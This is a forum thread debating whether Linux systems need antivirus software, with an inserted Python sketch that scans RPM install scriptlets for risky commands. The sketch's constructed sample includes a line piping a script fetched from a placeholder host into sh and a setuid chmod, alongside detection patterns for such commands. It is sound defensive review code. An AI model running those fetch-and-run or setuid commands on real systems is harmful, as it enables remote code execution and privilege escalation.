Linux - Security: This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
wow- isn't there a length restriction on these posts?
I agree with you somewhat- however, the main purpose of virus scanning is to REMOVE any malware that might be on your computer. For example, if, somehow, a computer does become infected, then it would be nice to stop that nasty program submitting all your passwords and credit card numbers.
I've been thinking though, on Windows people get viruses because they download programs from a site that has infected that program with a virus. On Linux (for the most part) you don't go combing the web to find a program to download, you download it from a repository set up by your distro, so getting a virus like that is much less likely.
Also note that most (good) anti-virus will scan any program that you download.
Distribution: Suse (10.2, 10.3), CentOS, and Ubuntu
Quote:
Originally Posted by ledow
I have always had least-privilege principles applied to everything (I don't install software I don't need, don't let it access things it doesn't need to, etc)
You obviously don't run Quickbooks, and don't have to run niche market applications. A lot of Windows apps are written such that Admin privileges are required, usually due to the locations of files it wants to write to, registry keys the apps want to access (e.g., HKLM rather than HKLU, etc.), using nonstandard ways to instantiate controls, or simply checking to verify the user has admin access, and of course it's always the totally nontechnical folks who need to run these apps and are always the first to click on that cute "screensaver" or "video" attachment received via email or mindlessly click on "yes" when prompted to install the mouse cursor collection or photo gallery wallpaper or whatever.
Distribution: Ubuntu / Windows dual boot (for now)
I am new at Linux so would someone....
....please explain to me the "security model differences" I keep hearing about (i.e., Windows vs Linux).
A friend of mine tried to explain it to me one time, and I sort of understood it. From what I gathered, running in "root" (which is what most Windows users do and most Linux users avoid) is perhaps the biggest risk. Is that all it comes down to? Surely there is more than that. Whether there is more to it or not, could someone explain (in simple n00b English) the "security model" difference between Windows and Linux?
Also, the only anti-virus software I know of on Linux is Clam Antivirus. That scans for Linux viruses, right?
ClamAV is a daemon for Unix(TM)-like mail servers. It scans the mail before some dumb schmuck downloads it on their Windows box. It scans for whatever malware is in its database. There are third-party add-ons for using it outside the email realm.
trying it now. --- still scanning but looks like I'm ok.
...I remember we had a win box come in the shop that was totally infected...
(#1 job out there for techs is spyware / virus scans... anyway)
it was wicked bad - the second you plugged it into the net it would flood the entire subnet.
there was no def for it, no virus scanner could locate and delete it, had to reinstall OS.
that was a wicked virus -- the ISP shut us down, flooding the entire subnet.....
denied - 2 suspicious files could be an archive bomb - I doubt it... but?
Last edited by commander.cb; 07-31-2006 at 01:19 AM.
ledow's big post on how bulletproof Linux is impressive ... and makes me feel safer on my Slack.
Nevertheless:
I think every systems administrator has to consider, if he can risk to have a network paralyzed or information lost.
Nowadays Linux does a lot of server tasks for Winblows client networks, like serving mail, sharing for winblows, Databases, Hosting Webs etc.
Even if we could discard 200% that there will never be a threat for the Linux OS, we should protect our Networks at all cost.
It is not just stupid Internet users that bring viruses, adware or spyware into our systems...
Every Floppy Drive, CD-Rom, USB-Memorystick, Email can be a possible way in.
ledow says when they're in the system they are already inside and it is too late. And unfortunately there is mostly no other way to detect them before.
So, you may say I am paranoid, but I think it is a good option to use our Linux boxes to protect the Winblows end users, and at the same time to prevent possible future Linux threats from spreading; especially on mail servers.
As long as there are marketing people with no respect for privacy out there, they will try to figure out our "Internet Browsing Behavior" by any means. Lots of their ways to spy on us are sometimes built into a silly little toolbar from your favorite search engine, mail-, storage- or messaging provider. And they install it without even asking you, bundled into something needful.
There are opensource solutions for antivirus out there, so it is no cost question.
There's really no need for antivirus programs on linux systems because:
1. Most people using Linux get their software from repositories set up by Linux distributions. Linux distributions tend to frown on things like spyware and viruses.
In contrast, Windows software comes from a variety of places-- most of whom are just out to make as much money as possible out of you. If that means installing a trojan along with your free goat-themed solitaire game, so be it.
2. Most people on Linux use package managers like RPM. These are pretty standardized, and you can look at the RPM to see what it's going to do when you install it.
In contrast, Windows software always has those horrible "installer" programs that do who-knows-what to your computer. Also, anyone who's ever had a Windows box knows that in many cases, running uninstaller programs doesn't get you back to a clean slate.
3. Linux doesn't have "undeletable files," and it doesn't hide file extensions.
4. Although Microsoft has been working to improve this, most Windows users still run everything as Administrator. The problem is, there are some older Windows programs that require this.
5. Linux has a smaller and more educated user base, so even if there were any viruses, they would have a hard time propagating.
(I really think the other factors are more important, though.)
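Point 2 in the post above (looking at an RPM to see what it will do at install time) can be partly automated. The sketch below is an added example, not part of the original post: it parses text in the format printed by `rpm -qp --scripts <package>.rpm` and flags scriptlet lines worth a manual look. The sample output and the rule list are constructed for illustration.

```python
import re

# Constructed sample of `rpm -qp --scripts` output (not from a real package).
SAMPLE = """\
preinstall scriptlet (using /bin/sh):
getent group demo >/dev/null || groupadd -r demo
postinstall scriptlet (using /bin/sh):
curl -s http://example.invalid/setup.sh | sh
chmod 4755 /usr/bin/demo-helper
/sbin/ldconfig
postuninstall program: /sbin/ldconfig
"""

# Section headers: "<phase> scriptlet (using <interp>):" or "<phase> program: <path>"
HEADER = re.compile(r"^(\w+) (?:scriptlet \(using [^)]+\):|program: (.+))$")

# Illustrative review heuristics (assumptions, not an exhaustive policy).
RULES = {
    "network-fetch": re.compile(r"\b(?:curl|wget)\b"),
    "pipe-to-shell": re.compile(r"\|\s*(?:ba)?sh\b"),
    "setuid-chmod": re.compile(r"\bchmod\s+(?:[ug]+\+s|[2467]\d{3})\b"),
    "persistence-path": re.compile(r"/etc/cron|/etc/rc\.local|/etc/profile"),
}

def parse_scriptlets(text):
    """Split rpm --scripts output into {phase: [command lines]}."""
    phases, current = {}, None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = m.group(1)
            # A "program:" header carries its single command on the same line.
            phases[current] = [m.group(2)] if m.group(2) else []
        elif current and line.strip():
            phases[current].append(line.strip())
    return phases

def review(text):
    """Return (phase, rule, line) for every scriptlet line a rule matches."""
    findings = []
    for phase, lines in parse_scriptlets(text).items():
        for line in lines:
            for rule, pattern in RULES.items():
                if pattern.search(line):
                    findings.append((phase, rule, line))
    return findings

if __name__ == "__main__":
    for phase, rule, line in review(SAMPLE):
        print(f"{phase:<14} {rule:<16} {line}")
```

Scriptlets run as root during installation, so a clean result here only covers install-time behaviour, not what the packaged binaries do once run.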
True, Linux doesn't need antivirus software for desktop use. I voted for Yes, though, because I use klamav to scan any .exe .zip and .rar that I download and copy to my winXP partition, especially those I download from untrusted sources like aMule.
Never had a single problem on Linux machines with viruses, but with hackers, that is a different story (Hackers deleted complete root on one server!!!).
Since then, first thing I do before connecting to internet is to configure and triple-check a firewall !!!
So, even if you are not afraid of Linux viruses, there is a very good reason to secure your PC.
I think Linux security is top notch- but that's not the point
IF a virus infects a Linux computer (like a keylogger) chances are that the Linux user will never know, or will only find out when he/she sees it transmitting/running by chance.
This is a very bad situation, as all credit card numbers- and other important information are likely to be stolen.
Somewhat agree with you, ledow. While truly malicious executables designed to compromise the integrity of systems (i.e. delete /) are a thing of the past in UNIX and UNIX-like systems (if they were ever successful on a large scale), spyware and adware may be just on the horizon with Linux. Already website owners require that Windows users implicitly download their malware as part of the "contract" of viewing their website (which is implicitly agreed to when the user attempts to access it). I wouldn't be surprised if future websites required Linux users to download such programs or scripts that would allow their malware to be installed. Consequently, a market for Linux malware scanners would develop.
Also, the best measure of defence, on any system, is the intelligence of the user (which, in turn, dictates the strength of the security software installed, if any).
On the side, does anyone know how well the Guard Dog firewall compares to other firewalls? Would it be wise to have redundant firewalls?